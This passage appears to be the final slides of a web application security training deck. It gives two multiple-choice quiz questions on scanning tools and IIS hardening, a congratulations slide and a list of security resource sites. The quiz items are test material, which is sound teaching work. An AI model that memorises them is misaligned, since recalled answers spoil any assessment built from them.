  • 37. Shichi (seven)
    Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?
    a. Banner grabbing
    b. Defeating authentication
    c. Scanning
    d. Password Cracking
    Difficulty: Medium/Hard
  • 38. Hachi (eight)
    What is a good tool to help harden an IIS web server? (choose the best answer)
    a. Cain and Abel
    b. URLscan
    c. ncat
    d. WebScarab
    Difficulty: Medium/Hard
  • 39. Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan.
  • 40. Resources
    • OWASP (Open Web Application Security Project) www.owasp.org
    • NIST (National Institute of Standards and Technology) www.nist.gov
    • SANS www.sans.org
    • Web Application Security Consortium (WASC) www.webappsec.org
    • SecTools.org http://sectools.org
  • 41. Questions?